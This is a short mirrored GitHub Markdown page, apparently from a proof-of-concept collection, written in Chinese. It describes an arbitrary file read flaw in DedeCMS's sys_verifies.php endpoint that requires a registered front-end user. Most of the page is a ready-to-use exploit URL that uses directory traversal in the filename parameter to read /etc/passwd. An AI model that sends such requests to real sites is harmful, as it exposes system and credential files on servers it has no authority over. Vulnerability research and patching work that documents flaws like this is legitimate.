mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-30 06:24:42 +00:00
11 lines
195 B
Markdown
11 lines
195 B
Markdown
# DeDecms接口sys_verifies.php存在任意文件读取漏洞
|
|
|
|
需前台注册用户权限。
|
|
|
|
## poc
|
|
|
|
```java
|
|
http://ip/dede/sys_verifies.php?action=view&filename=../../../../../etc/passwd
|
|
```
|
|
|